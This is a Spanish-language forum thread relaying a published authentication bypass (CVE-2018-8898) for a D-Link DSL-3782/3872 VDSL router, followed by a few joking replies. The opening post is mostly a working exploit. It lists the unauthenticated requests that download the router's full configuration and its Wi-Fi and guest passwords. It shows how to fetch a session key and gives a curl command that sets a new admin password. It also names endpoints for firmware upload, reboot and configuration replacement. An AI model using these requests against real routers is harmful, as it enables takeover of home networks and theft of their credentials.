Cómo entrar un D-Link DSL-3872 sin credenciales (CVE-2018-8898)

kcdtv · 21-05-2018 13:00:52

Cómo entrar en la interfaz de configuración de un D-Link DSL-3872 sin credenciales

fuente

D-Link DSL 3782 - Authentication Bypass by Giulio Comi @ packetsorms

El D-Link DSL-3872 es un modelo de doble banda con soporte ac.
No es un modelo de alta gama o de última generación pero tampoco está completamente desfasado.
Wireless AC1200 Dual Band VDSL ADSL Modem Router DSL‑3782
Vamos a ver juntos lo fácil que es saltarse los credenciales para tomar el control del dispositivo

Para obtener todas las contraseñas basta con entrar está petición en la barra del navegador

GET  http://192.168.1.1/romfile.cfg

Si lo que buscamos son solo las contraseñas wifi, podemos obtenerlas así:

Red b/g/n;

GET http://192.168.1.1/cgi-bin/get/New_GUI/Settings_24.asp

Red ac:

GET http://192.168.1.1/cgi-bin/get/New_GUI/Settings_5.asp

Red invitados

GET http://192.168.1.1/cgi-bin/New_GUI/GuestZone.asp

Si queremos modificar la configuración directamente, una llave de sesión es necesaria.
Se obtiene así:

GET http://192.168.1.1/cgi-bin/get/New_GUI/get_sessionKey.asp

Una vez que tenemos a esta llave podemos emplearla para cambiar la configuración del dispositivo con peticiones POST.
Ejemplos:

Cambiar los credenciales de administrador de acceso a la interfaz web

curl --data "Password=[NEW_PASSWORD_SET_BY_THE_ATTACKER]" \
--data "sessionKey=$(curl -sS http://192.168.1.1/cgi-bin/get/New_GUI/get_sessionKey.asp)" \
http://192.168.1.1/cgi-bin/New_GUI/Set/Admin.asp

Cambiar las contraseñas wifi

POST http://192.168.1.1/cgi-bin/New_GUI/WiFi_loding.asp

Actualizar firmware

POST http://192.168.1.1/cgi-bin/New_GUI/Set/firmware_upgrade.asp

Forzar reboot

POST http://192.168.1.1/cgi-bin/New_GUI/Set/reboot_wait.asp

Subir una nueva configuración

POST /cgi-bin/New_GUI/Set/config_upgrade.asp

El problema, otra vez, es que D-Link no ha hecho nada tras haber sido advertido. pam
Otro problema es que la explotar la brecha es de lo más sencillo debido a la pésima programación del firmware.
El router es básicamente incapaz de distinguir las peticiones de un usuario debidamente identificado de las peticiones de un usuario ilegitimo.
Los propietarios de esta "joya" que tienen el acceso remoto habilitado tienen literalmente "el culo al aire"
¡Gracias D-Link! roll

crash · 21-05-2018 13:13:08

vaya tela, ya solo le falta abrir la puerta de la cocina y traerte unas biere

kcdtv · 21-05-2018 13:18:42

Una lastima que los routers no tengan brazos y patas aún, sino sería posible con una "smart nevera" de estas conectada al PA. big_smile

josep345 · 21-05-2018 13:20:56

sheriff escribió:

Los propietarios de esta "joya" que tienen el acceso remoto habilitado tienen literalmente "el culo al aire"
¡Gracias D-Link!

Jajajajaja nunca mejor explicado Xd,a quien le gusta estar con el culo al aire,,,,buena información a tener muy en cuenta para los propietarios de dichos routers.

Tema	Respuestas	Vistas	Ultimo mensaje
Duda sobre cambio de antenas TP-Link td-w8961nd por red-free	1	17	Hoy 17:44:23 por kcdtv
Como se genera la contraseña WPA de los ARRIS DG860A por kcdtv	11	18907	Hoy 15:14:39 por kcdtv
Asus USB-AC56 Adaptador USB 3.0 Wireless AC1300 es compatible? por estufaconalas	17	534	Hoy 15:04:33 por kcdtv
Handshake capturado con linset y wifimosys pero en ataque no hace nada por pardalis	5	575	Ayer 14:17:52 por kcdtv
Pegado: Pegado:: WPS modo PIN livebox fibra: Talón de aquilea de las MiFibra-XXXX por kcdtv [ 1 2 3 ]	74	69973	07-12-2018 19:59:25 por josep345

Foro Wifi-libre.com

Anuncio

#1 21-05-2018 13:00:52